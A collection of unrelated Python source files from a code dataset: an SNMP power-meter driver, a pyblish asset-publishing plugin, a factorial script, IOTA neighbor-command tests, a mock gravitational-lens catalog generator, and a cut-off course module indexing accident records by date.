-*- coding: utf-8 -*-\n#\n# Author: François Rossigneux \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n#    http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport time\n\nfrom pysnmp.entity.rfc3413.oneliner import cmdgen\n\nfrom kwapi.utils import log\nfrom driver import Driver\n\nLOG = log.getLogger(__name__)\n\nclass Snmp(Driver):\n    \"\"\"Driver for SNMP based PDUs.\"\"\"\n\n    def __init__(self, probe_ids, probes_names, probe_data_type, **kwargs):\n        \"\"\"Initializes the SNMP driver.\n\n        Keyword arguments:\n        probe_ids -- list containing the probes IDs\n                     (a metric meter sometimes monitors several probes)\n        kwargs -- keyword (protocol, user or community, ip, oid) defining the\n                  SNMP parameters\n                  Eaton OID is 1.3.6.1.4.1.534.6.6.7.6.5.1.3\n                  Raritan OID is 1.3.6.1.4.1.13742.4.1.2.2.1.7\n\n        \"\"\"\n        Driver.__init__(self, probe_ids, probes_names, probe_data_type, kwargs)\n        self.cmd_gen = cmdgen.CommandGenerator()\n\n    def work(self):\n        \"\"\"driver process main work.\"\"\"\n        while not self.stop_request_pending():\n            try:\n                req_time = time.time()\n                measure_time = time.time()\n                metrics_list = self.get_metrics()\n                #Sum duplicate probes' metrics in a dedicated dictionary\n                agg_values = {}\n                if metrics_list is not None:\n                    for i, metrics in enumerate(metrics_list):\n                        probe = self.probe_ids[i]\n                        if not probe:\n                            continue\n                        # probe_data_type = {'name':'switch.port.receive.bytes',\n                        #                    'type':'Cummulative',\n                        #                    'unit':'B'}\n                        if self.probe_data_type['type'] == 'Gauge':\n                            if not probe in agg_values:\n                                agg_values[probe] = 0\n                            agg_values[probe] += metrics\n                        else:\n                            measurements = self.create_measurements(probe,\n                                                                    measure_time,\n                                                                    metrics)\n                            self.send_measurements(probe, measurements)\n                    #Send each sum of probe\n                    for probe, agg_value in agg_values.items():\n                        measurements = self.create_measurements(probe,\n                                                                measure_time,\n                                                                agg_value)\n                        self.send_measurements(probe, measurements)\n                time.sleep(max(0, self.kwargs.get('resolution', 1)-(time.time()-req_time)))\n            except Exception as e:\n                LOG.error(\"Exception in SNMP process: %s\" % e)\n\n    def get_metrics(self):\n        \"\"\"Returns the OID field.\"\"\"\n        protocol = self.kwargs.get('protocol')\n        if protocol == '1':\n            community_or_user = cmdgen.CommunityData(\n                self.kwargs.get('community'),\n                mpModel=0)\n        elif protocol == '2c':\n            community_or_user = cmdgen.CommunityData(\n                self.kwargs.get('community'),\n                mpModel=1)\n        elif protocol == '3':\n            community_or_user = cmdgen.UsmUserData(self.kwargs.get('user'))\n        errorIndication, errorStatus, errorIndex, varBindTable = \\\n            self.cmd_gen.bulkCmd(\n                community_or_user,\n                cmdgen.UdpTransportTarget((self.kwargs.get('ip'), 161)),\n                1, 0,\n                self.kwargs.get('oid'),\n                maxRows=len(self.probe_ids),\n            )\n\n        if errorIndication:\n            LOG.error(errorIndication)\n            LOG.error(\"Request: %s\\t%s\\t%s\\t%s\" \n                      % (self.kwargs.get('user'), self.kwargs.get('ip'),\n                         self.kwargs.get('oid'), self.probe_ids[0]))\n            return None\n        else:\n            if errorStatus:\n                LOG.error('%s at %s' % (\n                    errorStatus.prettyPrint(),\n                    errorIndex and varBindTable[-1][int(errorIndex) - 1] or '?'\n                ))\n                return None\n            else:\n                outlet_list = []\n                for varBindTableRow in varBindTable:\n                    for name, value in varBindTableRow:\n                        outlet_list.append(int(value))\n                return outlet_list\n\n","sub_path":"kwapi/drivers/snmp.py","file_name":"snmp.py","file_ext":"py","file_size_in_byte":5099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"63839459","text":"import pyblish.api\n\n\nclass IntegrateMindbenderAsset(pyblish.api.InstancePlugin):\n    \"\"\"Write to files and metadata\n\n    This plug-in exposes your 
data to others by encapsulating it\n into a new version.\n\n Schema:\n Data is written in the following format.\n ____________________\n | |\n | version |\n | ________________ |\n | | | |\n | | representation | |\n | |________________| |\n | | | |\n | | ... | |\n | |________________| |\n |____________________|\n\n \"\"\"\n\n label = \"Integrate Mindbender Asset\"\n order = pyblish.api.IntegratorOrder\n families = [\n \"mindbender.model\",\n \"mindbender.rig\",\n \"mindbender.animation\",\n \"mindbender.lookdev\",\n \"mindbender.historyLookdev\",\n ]\n\n def process(self, instance):\n import os\n import errno\n import shutil\n from pprint import pformat\n\n from mindbender import api, io\n\n assert all(os.getenv(env) for env in (\n \"MINDBENDER__ASSET\", \"MINDBENDER__PROJECT\")), (\n \"Missing environment variables\\n\"\n \"This can sometimes happen when an application was launched \\n\"\n \"manually, outside of the pipeline.\"\n )\n\n context = instance.context\n\n # Atomicity\n #\n # Guarantee atomic publishes - each asset contains\n # an identical set of members.\n # __\n # / o\n # / \\\n # | o |\n # \\ /\n # o __/\n #\n assert all(result[\"success\"] for result in context.data[\"results\"]), (\n \"Atomicity not held, aborting.\")\n\n # Assemble\n #\n # |\n # v\n # ---> <----\n # ^\n # |\n #\n stagingdir = instance.data.get(\"stagingDir\")\n assert stagingdir, (\n \"Incomplete instance \\\"%s\\\": \"\n \"Missing reference to staging area.\"\n % instance\n )\n\n self.log.debug(\"Establishing staging directory @ %s\" % stagingdir)\n\n project = io.find_one({\n \"_id\": io.ObjectId(os.environ[\"MINDBENDER__PROJECT\"])\n })\n\n asset = io.find_one({\n \"_id\": io.ObjectId(os.environ[\"MINDBENDER__ASSET\"])\n })\n\n assert all([project, asset]), \"This is bug\"\n\n subset = io.find_one({\n \"type\": \"subset\",\n \"parent\": asset[\"_id\"],\n \"name\": instance.data[\"subset\"]\n })\n\n if subset is None:\n self.log.info(\"Subset '%s' not found, creating..\"\n % instance.data[\"subset\"])\n\n _id = io.insert_one({\n \"schema\": \"mindbender-core:subset-2.0\",\n \"type\": \"subset\",\n \"name\": instance.data[\"subset\"],\n \"data\": {},\n \"parent\": asset[\"_id\"]\n }).inserted_id\n\n subset = io.find_one({\"_id\": _id})\n\n all_versions = [0] + [\n version[\"name\"]\n for version in io.find({\n \"type\": \"version\",\n \"parent\": subset[\"_id\"]\n }, {\"name\": True})\n ]\n\n next_version = sorted(all_versions)[-1] + 1\n\n # versiondir = template_versions.format(**template_data)\n self.log.debug(\"Next version: %i\" % next_version)\n\n version = {\n \"schema\": \"mindbender-core:version-2.0\",\n \"type\": \"version\",\n \"parent\": subset[\"_id\"],\n \"name\": next_version,\n\n \"data\": {\n # Used to identify family of assets already on disk\n \"families\": instance.data.get(\"families\", list()) + [\n instance.data.get(\"family\")\n ],\n\n \"time\": context.data[\"time\"],\n \"author\": context.data[\"user\"],\n\n \"source\": os.path.join(\n \"{root}\",\n os.path.relpath(\n context.data[\"currentFile\"],\n api.registered_root()\n )\n ).replace(\"\\\\\", \"/\"),\n }\n }\n\n self.backwards_compatiblity(instance, version)\n\n self.log.debug(\"Creating version: %s\" % pformat(version))\n version_id = io.insert_one(version).inserted_id\n\n # Write to disk\n # _\n # | |\n # _| |_\n # ____\\ /\n # |\\ \\ / \\\n # \\ \\ v \\\n # \\ \\________.\n # \\|________|\n #\n template_data = {\n \"root\": api.registered_root(),\n \"project\": os.environ[\"MINDBENDER_PROJECT\"],\n \"silo\": 
os.environ[\"MINDBENDER_SILO\"],\n \"asset\": os.environ[\"MINDBENDER_ASSET\"],\n \"subset\": subset[\"name\"],\n \"version\": version[\"name\"],\n }\n\n template_publish = project[\"config\"][\"template\"][\"publish\"]\n\n for fname in os.listdir(stagingdir):\n name, ext = os.path.splitext(fname)\n template_data[\"representation\"] = ext[1:]\n\n src = os.path.join(stagingdir, fname)\n dst = template_publish.format(**template_data)\n\n # Backwards compatibility\n if fname == \".metadata.json\":\n dirname = os.path.dirname(dst)\n dst = os.path.join(dirname, \".metadata.json\")\n\n self.log.info(\"Copying %s -> %s\" % (src, dst))\n\n dirname = os.path.dirname(dst)\n try:\n os.makedirs(dirname)\n except OSError as e:\n if e.errno == errno.EEXIST:\n pass\n else:\n self.log.critical(\"An unexpected error occurred.\")\n raise\n\n shutil.copy(src, dst)\n\n representation = {\n \"schema\": \"mindbender-core:representation-2.0\",\n \"type\": \"representation\",\n \"parent\": version_id,\n \"name\": ext[1:],\n \"data\": {\n \"label\": {\n \".ma\": \"Maya Ascii\",\n \".source\": \"Original source file\",\n \".abc\": \"Alembic\"\n }.get(ext)\n }\n }\n\n io.insert_one(representation)\n\n self.log.info(\"Successfully integrated \\\"%s\\\" to \\\"%s\\\"\" % (\n instance, dst))\n\n def backwards_compatiblity(self, instance, version):\n \"\"\"Maintain backwards compatibility with newly published assets\n\n With the introduction of the database in 2.0, the artist would be\n unable to publish in 2.0 and use the files in 1.0. Therefore, we\n introduce this mechanism which continue to write for 1.0 even\n when writing from the 2.0 pipeline.\n\n This behaviour is deprecated and is to be removed in a future release.\n\n \"\"\"\n\n import os\n import json\n import errno\n from mindbender import api\n\n context = instance.context\n\n # Metadata\n # _________\n # | |.key = value\n # | |\n # | |\n # | |\n # | |\n # |_________|\n #\n stagingdir = instance.data.get(\"stagingDir\")\n fname = os.path.join(stagingdir, \".metadata.json\")\n\n root = os.environ[\"MINDBENDER_ASSETPATH\"]\n instancedir = os.path.join(root, \"publish\", instance.data[\"subset\"])\n\n try:\n os.makedirs(instancedir)\n except OSError as e:\n if e.errno != errno.EEXIST: # Already exists\n self.log.critical(\"An unexpected error occurred.\")\n raise\n\n latest_version = api.find_latest_version(os.listdir(instancedir)) + 1\n versiondir = os.path.join(\n instancedir,\n api.format_version(latest_version)\n )\n\n try:\n with open(fname) as f:\n version_1_0 = json.load(f)\n\n except IOError:\n version_1_0 = dict(version, **{\n \"schema\": \"mindbender-core:version-1.0\",\n\n # Hard-coded during transition\n \"path\": versiondir.replace(\"\\\\\", \"/\"),\n \"representations\": list(),\n\n \"version\": version[\"name\"],\n\n # Used to identify family of assets already on disk\n \"families\": instance.data.get(\"families\", list()) + [\n instance.data.get(\"family\")\n ],\n\n \"time\": context.data[\"time\"],\n \"author\": context.data[\"user\"],\n\n # Record within which silo this asset was made.\n \"silo\": os.environ[\"MINDBENDER_SILO\"],\n\n # Collected by pyblish-maya\n \"source\": os.path.join(\n \"{root}\",\n os.path.relpath(\n context.data[\"currentFile\"],\n os.path.join(\n api.registered_root(),\n os.environ[\"MINDBENDER_PROJECT\"]\n )\n )\n ).replace(\"\\\\\", \"/\"),\n\n # Discard database keys\n \"parent\": None,\n })\n\n for filename in instance.data.get(\"files\", list()):\n name, ext = os.path.splitext(filename)\n 
version_1_0[\"representations\"].append(\n {\n \"schema\": \"mindbender-core:representation-1.0\",\n \"format\": ext,\n \"path\": os.path.join(\n \"{dirname}\",\n \"%s{format}\" % name,\n ).replace(\"\\\\\", \"/\")\n }\n )\n\n # Write to disk\n # _\n # | |\n # _| |_\n # ____\\ /\n # |\\ \\ / \\\n # \\ \\ v \\\n # \\ \\________.\n # \\|________|\n #\n with open(fname, \"w\") as f:\n json.dump(version_1_0, f, indent=4)\n\n self.log.info(\"Successfully wrote %s.\" % fname)\n","sub_path":"mindbender/plugins/integrate_asset.py","file_name":"integrate_asset.py","file_ext":"py","file_size_in_byte":10188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"123195273","text":"import sys\n\ndef factoriel(n):\n if ( n > 1 ):\n return n * factoriel(n-1)\n else:\n return 1\n\ndef main(arg):\n print(\"Le factoriel de \" + str(arg) + \" est \" + str(factoriel(arg)) + \".\")\n\nif __name__ == \"__main__\":\n arg = sys.argv[1]\n main(int(arg))\n","sub_path":"chapitre1/exercice.1.2.1/factoriel.py","file_name":"factoriel.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"473737326","text":"from unittest import TestCase\n\nimport filters as f\nfrom filters.test import BaseFilterTestCase\nfrom iota import Iota, AsyncIota\nfrom iota.adapter import MockAdapter, async_return\nfrom iota.commands.core.add_neighbors import AddNeighborsCommand\nfrom iota.filters import NodeUri\nfrom test import patch, MagicMock, async_test\n\n\nclass AddNeighborsRequestFilterTestCase(BaseFilterTestCase):\n filter_type = AddNeighborsCommand(MockAdapter()).get_request_filter\n skip_value_check = True\n\n def test_pass_valid_request(self):\n \"\"\"\n The incoming request is valid.\n \"\"\"\n request = {\n 'uris': [\n 'udp://node1.iotatoken.com',\n 'udp://localhost:14265/',\n ],\n }\n\n filter_ = self._filter(request)\n\n self.assertFilterPasses(filter_)\n self.assertDictEqual(filter_.cleaned_data, request)\n\n def test_fail_empty(self):\n \"\"\"\n The incoming request is empty.\n \"\"\"\n self.assertFilterErrors(\n {},\n\n {\n 'uris': [f.FilterMapper.CODE_MISSING_KEY],\n },\n )\n\n def test_fail_unexpected_parameters(self):\n \"\"\"\n The incoming request contains unexpected parameters.\n \"\"\"\n self.assertFilterErrors(\n {\n 'uris': ['udp://localhost'],\n\n # I've never seen that before in my life, officer.\n 'foo': 'bar',\n },\n\n {\n 'foo': [f.FilterMapper.CODE_EXTRA_KEY],\n },\n )\n\n def test_fail_neighbors_null(self):\n \"\"\"\n ``uris`` is null.\n \"\"\"\n self.assertFilterErrors(\n {\n 'uris': None,\n },\n\n {\n 'uris': [f.Required.CODE_EMPTY],\n },\n )\n\n def test_fail_uris_wrong_type(self):\n \"\"\"\n ``uris`` is not an array.\n \"\"\"\n self.assertFilterErrors(\n {\n # Nope; it's gotta be an array, even if you only want to add\n # a single neighbor.\n 'uris': 'udp://localhost:8080/'\n },\n\n {\n 'uris': [f.Type.CODE_WRONG_TYPE]\n },\n )\n\n def test_fail_uris_empty(self):\n \"\"\"\n ``uris`` is an array, but it's empty.\n \"\"\"\n self.assertFilterErrors(\n {\n # Insert \"Forever Alone\" meme here.\n 'uris': [],\n },\n\n {\n 'uris': [f.Required.CODE_EMPTY],\n },\n )\n\n def test_fail_uris_contents_invalid(self):\n \"\"\"\n ``uris`` is an array, but it contains invalid values.\n \"\"\"\n self.assertFilterErrors(\n {\n 'uris': [\n '',\n False,\n None,\n b'udp://localhost:8080/',\n 'not a valid uri',\n\n # This is actually valid; I just added it to make sure the\n # filter isn't 
cheating!\n                    'udp://localhost:14265',\n\n                    # Only UDP URIs are allowed.\n                    'http://localhost:14265',\n\n                    2130706433,\n                ],\n            },\n\n            {\n                'uris.0': [f.Required.CODE_EMPTY],\n                'uris.1': [f.Type.CODE_WRONG_TYPE],\n                'uris.2': [f.Required.CODE_EMPTY],\n                'uris.3': [f.Type.CODE_WRONG_TYPE],\n                'uris.4': [NodeUri.CODE_NOT_NODE_URI],\n                'uris.6': [NodeUri.CODE_NOT_NODE_URI],\n                'uris.7': [f.Type.CODE_WRONG_TYPE],\n            },\n        )\n\n\nclass AddNeighborsCommandTestCase(TestCase):\n    def setUp(self):\n        super(AddNeighborsCommandTestCase, self).setUp()\n\n        self.adapter = MockAdapter()\n\n    def test_wireup(self):\n        \"\"\"\n        Verify that the command is wired up correctly. (sync)\n\n        The API method indeed calls the appropriate command.\n        \"\"\"\n        with patch('iota.commands.core.add_neighbors.AddNeighborsCommand.__call__',\n                   MagicMock(return_value=async_return('You found me!'))\n                   ) as mocked_command:\n\n            api = Iota(self.adapter)\n\n            response = api.add_neighbors('test_uri')\n\n            self.assertTrue(mocked_command.called)\n\n            self.assertEqual(\n                response,\n                'You found me!'\n            )\n\n    @async_test\n    async def test_wireup_async(self):\n        \"\"\"\n        Verify that the command is wired up correctly. (async)\n\n        The API method indeed calls the appropriate command.\n        \"\"\"\n        with patch('iota.commands.core.add_neighbors.AddNeighborsCommand.__call__',\n                   MagicMock(return_value=async_return('You found me!'))\n                   ) as mocked_command:\n\n            api = AsyncIota(self.adapter)\n\n            response = await api.add_neighbors('test_uri')\n\n            self.assertTrue(mocked_command.called)\n\n            self.assertEqual(\n                response,\n                'You found me!'\n            )","sub_path":"test/commands/core/add_neighbors_test.py","file_name":"add_neighbors_test.py","file_ext":"py","file_size_in_byte":4347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"634575757","text":"import lens_models\nimport numpy as np\nfrom allZeTools import statistics\nimport pickle\nfrom sonnentools.cgsconstants import *\nfrom scipy.interpolate import splrep, splev\nfrom scipy.stats import truncnorm\nfrom spherical_jeans import sigma_model\nfrom spherical_jeans.tracer_profiles import deVaucouleurs\nfrom spherical_jeans.mass_profiles import nfw, sersic\n\n\nmockname = 'mockO2019'\n\nday = 24.*3600.\n\nnlens=100\n\nmstar_mu=11.4\nmstar_sig=0.1\n\nmhalo_mu=13.2\nmhalo_sig=0.3\nmstar_mhalo=0.7\nmhalo_piv = 13.2\n\ncvir_sig=0.1\ncvir_mu=0.877\ncvir_beta=-0.094\n\naimf_mu=0.\naimf_sig=0.05\n\nlogreff_mu=0.46\nlogreff_sig = 0.16\n\nmstar_err=0.1\nradmagrat_err=0.020\nimerr=0.01\ndt_err=1.\n\nsigma_err = 10.\n\nmax_asymm = 0.2\n\nh=0.7\n\nngrid = 31\nrs2reff_grid = np.logspace(-1., 2., ngrid)\nnfw_s2_grid = 0.*rs2reff_grid\nnr = 1001\nr_grid = np.logspace(-3., 3., nr)\nfor i in range(ngrid):\n    norm = 1./nfw.M3d(1., rs2reff_grid[i])\n    s2_here = sigma_model.sigma2((r_grid, norm*nfw.M3d(r_grid, rs2reff_grid[i])), 0.5, 1., light_profile=deVaucouleurs)\n    nfw_s2_grid[i] = s2_here * G * M_Sun / kpc / 1e10\n\nnfw_re2_s2_spline = splrep(rs2reff_grid, nfw_s2_grid)\n\ndeV_M3d_spline = sersic.get_m3d_spline(4., 1.)\ndeV_re2_s2 = sigma_model.sigma2((r_grid, splev(r_grid, deV_M3d_spline)), 0.5, 1., deVaucouleurs) * G * M_Sun / kpc / 1e10\n\n# redshift distribution of lenses: uniform between 0.2 and 0.4 (hardcoded)\nzds = np.random.rand(nlens)*0.2+0.2\n\n# redshift distribution of sources: truncated normal 
(hardcoded)\nzs_min = 0.7\nzs_max = 4.\nzs_mu = 1.5\nzs_sig = 0.5\na, b = (zs_min - zs_mu)/zs_sig, (zs_max - zs_mu)/zs_sig\nzss = truncnorm.rvs(a, b, size=nlens)*zs_sig + zs_mu\n\n# distribution of halo masses: Gaussian\nmhalos = mhalo_mu + np.random.normal(0., mhalo_sig, nlens)\n\n# distribution of stellar masses: power-law dependence on halo mass + scatter\nmstars = mstar_mu + mstar_mhalo*(mhalos - mhalo_piv) + np.random.normal(0., mstar_sig, nlens)\n\n# distribution of stellar IMF: Gaussian\naimfs = np.random.normal(aimf_mu, aimf_sig, nlens)\n\n# SED-fitting stellar masses\nmstars_sps = mstars - aimfs\n\n# observed SED-fitting stellar masses\nmstars_meas = mstars_sps + np.random.normal(0., mstar_err, nlens)\n\n# percentage uncertainties on observed radial magnification ratio\nradmagrat_errs = np.random.normal(0., radmagrat_err, nlens)\n\n# distribution in concentration: using Mass-concentration relation from Maccio et al. 2008 + scatter\nlogcvirs = cvir_mu + cvir_beta*(mhalos-13.) + np.random.normal(0., cvir_sig, nlens)\n\n# distribution in effective radii: power-law dependence on stellar mass and redshift plus scatter\nlogreffs = logreff_mu + 0.59*(mstars - 11.) - 0.26*(zds - 0.7) + np.random.normal(0., logreff_sig, nlens)\nreffs = 10.**logreffs\n\n# calculates central velocity dispersion\nsigma_sample = np.zeros(nlens)\nsigma_obs = np.zeros(nlens)\nsigma_dev = np.random.normal(0., sigma_err, nlens)\n\nhyperpars = {'h': h, 'mstar_mu': mstar_mu, 'mstar_sig': mstar_sig, 'mhalo_mu': mhalo_mu, 'mhalo_sig': mhalo_sig, \\\n             'mstar_mhalo': mstar_mhalo, 'cvir_mu': cvir_mu, 'cvir_beta': cvir_beta, 'cvir_sig': cvir_sig, \\\n             'aimf_mu': aimf_mu, 'aimf_sig': aimf_sig, 'logreff_mu': logreff_mu, 'mstar_err': mstar_err, \\\n             'radmagrat_err': radmagrat_err, 'imerr': imerr, 'dt_err': dt_err}\n\noutput = {'truth': hyperpars, 'mhalo_sample': mhalos, 'mstar_sample': mstars, 'msps_sample': mstars_sps, \\\n          'aimf_sample': aimfs, 'msps_obs_sample': mstars_meas, 'reff_sample': reffs, 'logcvir_sample': logcvirs, \\\n          'zd_sample': zds, 'zs_sample': zss}\n\nlenses = []\nfor i in range(nlens):\n    lens = lens_models.NfwDev(zd=zds[i], zs=zss[i], mstar=10.**mstars[i], mhalo=10.**mhalos[i], \\\n                              reff_phys=reffs[i], cvir=10.**logcvirs[i], h=h, delta_halo=200.)\n\n    lens.normalize()\n    lens.get_rein()\n    lens.get_caustic()\n\n    m200tomrs = (np.log(2.) - 0.5)/(np.log(1. + lens.cvir) - lens.cvir/(1. + lens.cvir))\n\n    s2_halo = lens.mhalo * m200tomrs*splev(lens.rs/lens.reff, nfw_re2_s2_spline)/reffs[i]\n    s2_bulge = lens.mstar * deV_re2_s2 / reffs[i]\n\n    sigma_sample[i] = (s2_halo + s2_bulge)**0.5\n\n    lens.obs_sigma = (sigma_sample[i] + sigma_dev[i], sigma_err)\n    sigma_obs[i] = lens.obs_sigma[0]\n\n    ymax = lens.rein * (1. 
+ max_asymm))\n\n # source position: uniform distribution in a circle\n ysource = (np.random.rand(1))**0.5*ymax\n\n lens.source = ysource\n lens.get_images()\n lens.get_radmag_ratio()\n lens.get_timedelay()\n\n imerrs = np.random.normal(0., imerr, 2)\n lens.obs_images = ((lens.images[0] + imerrs[0], lens.images[1] + imerrs[1]), imerr)\n lens.obs_lmstar = (mstars_meas[i], mstar_err)\n lens.obs_radmagrat = (lens.radmag_ratio + radmagrat_errs[i], radmagrat_err)\n lens.obs_timedelay = (lens.timedelay + day*np.random.normal(0., dt_err, 1), dt_err*day)\n\n if lens.images is None:\n df\n\n lenses.append(lens)\n\noutput['sigma_sample'] = sigma_sample\noutput['sigma_obs'] = sigma_obs\noutput['sigma_err'] = sigma_err\n\noutput['lenses'] = lenses\n\nf = open('%s.dat'%mockname, 'wb')\npickle.dump(output, f)\nf.close()\n\n","sub_path":"paper/make_mock.py","file_name":"make_mock.py","file_ext":"py","file_size_in_byte":5140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"96214831","text":"\"\"\"\n * Copyright 2020, Departamento de sistemas y Computación\n * Universidad de Los Andes\n *\n *\n * Desarrolado para el curso ISIS1225 - Estructuras de Datos y Algoritmos\n *\n *\n * This program is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program. 
If not, see <http://www.gnu.org/licenses/>.\n \"\"\"\nimport config\nfrom DISClib.ADT import list as lt\nfrom DISClib.ADT import orderedmap as om\nfrom DISClib.DataStructures import mapentry as me\nfrom DISClib.ADT import map as m\nimport datetime\nassert config\n\n\"\"\"\nIn this file we define the ADTs that we are going to use,\nthat is, it contains the models with the in-memory data\n\n\n\"\"\"\n\n# -----------------------------------------------------\n# API of the accident catalog ADT\n# -----------------------------------------------------\n\ndef newCatalog_1():\n    \"\"\" Initializes the catalog and\n    returns the initialized catalog\n    \"\"\"\n    catalog = {'accidents': None,\n               \"2016\": None,\n               \"2017\": None,\n               \"2018\": None,\n               \"2019\": None,\n               \"2020\": None\n               }\n\n    catalog[\"accidents\"] = lt.newList(\"ARRAY_LIST\",compareAccidentsId)\n    catalog[\"2016\"] = om.newMap(omaptype=\"BST\",comparefunction=CompareDates_Final) \n    catalog[\"2017\"] = om.newMap(omaptype=\"BST\",comparefunction=CompareDates_Final) \n    catalog[\"2018\"] = om.newMap(omaptype=\"BST\",comparefunction=CompareDates_Final) \n    catalog[\"2019\"] = om.newMap(omaptype=\"BST\",comparefunction=CompareDates_Final)\n    catalog[\"2020\"] = om.newMap(omaptype=\"BST\",comparefunction=CompareDates_Final)\n    \n    return catalog\ndef newCatalog():\n    \"\"\" Initializes the catalog and\n    returns the initialized catalog\n    \"\"\"\n    catalog = {'accidents': None,\n               \"2016\": None,\n               \"2017\": None,\n               \"2018\": None,\n               \"2019\": None,\n               \"2020\": None\n               }\n\n    catalog[\"accidents\"] = lt.newList(\"ARRAY_LIST\",compareAccidentsId)\n    catalog[\"2016\"] = om.newMap(omaptype=\"RBT\",comparefunction=CompareDates_Final) \n    catalog[\"2017\"] = om.newMap(omaptype=\"RBT\",comparefunction=CompareDates_Final) \n    catalog[\"2018\"] = om.newMap(omaptype=\"RBT\",comparefunction=CompareDates_Final) \n    catalog[\"2019\"] = om.newMap(omaptype=\"RBT\",comparefunction=CompareDates_Final)\n    catalog[\"2020\"] = om.newMap(omaptype=\"RBT\",comparefunction=CompareDates_Final)\n    \n    return catalog\n# Functions to add information to the catalog\n\ndef addAccident(catalog,accident):\n    \"\"\"\n    Adds an accident to the accident list\n    \"\"\" \n    occurred_start_date = accident[\"Start_Time\"]\n    accident_date = datetime.datetime.strptime(occurred_start_date, \"%Y-%m-%d %H:%M:%S\")\n    ocurred_year = str(accident_date.year) \n    lt.addLast(catalog[\"accidents\"],accident)\n    uptadeAccidentInDate(catalog[ocurred_year],accident) \n    return catalog \n\ndef newDateEntry():\n    \"\"\"\n    Creates a node for a given date with its respective keys\n    \"\"\"\n    entry = {\"Severities_mp\": None, \"Accidents_lst\": None}\n    entry[\"Severities_mp\"] = m.newMap(numelements=15,maptype=\"PROBING\",comparefunction=CompareSeverity_prueba)\n    entry[\"Accidents_lst\"] = lt.newList(\"SINGLE_LINKED\", CompareDates_Final)\n    return entry\n\ndef newSeverityEntry(accident):\n    \"\"\"\n    Creates the severity entry (severity) \n    \"\"\"\n    severity_entry = {\"Severity\": None, \"ListBySeverity\": None}\n    severity_entry[\"Severity\"] = accident[\"Severity\"]\n    severity_entry[\"ListBySeverity\"] = lt.newList(\"SINGLE_LINKED\", CompareSeverity_prueba)\n    return severity_entry\n\ndef uptadeAccidentInDate(year_map,accident):\n    \"\"\"\n    Checks whether the accident date entry exists; if not, creates it\n    \"\"\"\n    ocurred_date = accident[\"Start_Time\"]\n    accident_date = datetime.datetime.strptime(ocurred_date, \"%Y-%m-%d %H:%M:%S\")\n    entry = om.get(year_map,accident_date.date())\n\n    if entry is None:\n        date_entry = newDateEntry()\n        \n        
om.put(year_map,accident_date.date(),date_entry) \n else:\n date_entry = me.getValue(entry)\n \n addSeverityToDateEntry(date_entry,accident)\n return year_map\n\ndef addSeverityToDateEntry(date_entry,accident):\n \"\"\"\n Actualiza el grado de severidad.\n \"\"\"\n lt.addLast(date_entry[\"Accidents_lst\"],accident)\n severity = accident[\"Severity\"]\n entry = m.get(date_entry[\"Severities_mp\"], severity)\n\n if entry != None:\n\n severity_entry = me.getValue(entry)\n lt.addLast(severity_entry[\"ListBySeverity\"],accident)\n\n else:\n severity_entry = newSeverityEntry(accident)\n lt.addLast(severity_entry[\"ListBySeverity\"],accident)\n m.put(date_entry[\"Severities_mp\"] , severity, severity_entry)\n \n \n return date_entry\n\n# ==============================\n# Funciones de consulta\n# ==============================\n\ndef getAccidentsByDate(year_bst,search_date):\n \"\"\"\n Reto3 - Req1\n Retorna el número de accidentes ocurridos en una fecha\n \"\"\" \n\n Accidents_Date = om.get(year_bst,search_date)\n\n if Accidents_Date[\"key\"] is not None:\n return me.getValue(Accidents_Date)\n \n return None\n\ndef getAccidentsBeforeDate(year_RBT,search_date):\n \"\"\"\n Reto3 - Req2\n Retorna el número de accidentes ocurridos anteriores a una fecha\n \"\"\" \n Accidents_Date = om.get(year_RBT,search_date)\n \n if Accidents_Date != None:\n\n key_date = Accidents_Date[\"key\"]\n keylow = om.minKey(year_RBT)\n\n return om.keys(year_RBT,keylow,key_date)\n return None\n\ndef getAccidentsInRange(catalog,initial_date,final_date):\n \"\"\"\n Reto3 - Req3\n Retorna el número de accidentes ocurridos en un rango de fechas\n \"\"\" \n initial_year = str(initial_date.year)\n final_year = str(final_date.year) \n \n if initial_date == None and final_date == None:\n print(\"La fecha ingresada es errónea\")\n else:\n\n if initial_year == final_year:\n \n keylow = om.get(catalog[initial_year],initial_date)[\"key\"]\n keyhigh = om.get(catalog[initial_year],final_date)[\"key\"]\n \n return 0 , om.values(catalog[initial_year],keylow,keyhigh)\n else:\n\n keymax = om.maxKey(catalog[initial_year])\n dates_initial_year = om.values(catalog[initial_year],initial_date,keymax)\n\n keymin = om.minKey(catalog[final_year])\n dates_final_year = om.values(catalog[final_year],final_date,keymin)\n return 1 , dates_initial_year , dates_final_year\n\n return None\n\ndef auxiliardelaauxiliar(catalog,initial_date,final_date):\n \"\"\"\n Retorna una tupla dependiendo si el rango abarca uno o dos años\n \"\"\" \n initial_year = str(initial_date.year)\n final_year = str(final_date.year) \n \n initial_date_accidents = om.contains(catalog[initial_year],initial_date)\n final_date_accidents = om.contains(catalog[final_year],final_date)\n\n i=0\n \n if i==0 and initial_date_accidents and final_date_accidents:\n \n if initial_year == final_year: \n\n keylow = om.get(catalog[initial_year],initial_date)[\"key\"]\n keyhigh = om.get(catalog[initial_year],final_date)[\"key\"]\n \n return 0 , om.keys(catalog[initial_year],keylow,keyhigh)\n\n else: \n\n keymax = om.maxKey(catalog[initial_year])\n dates_initial_year = 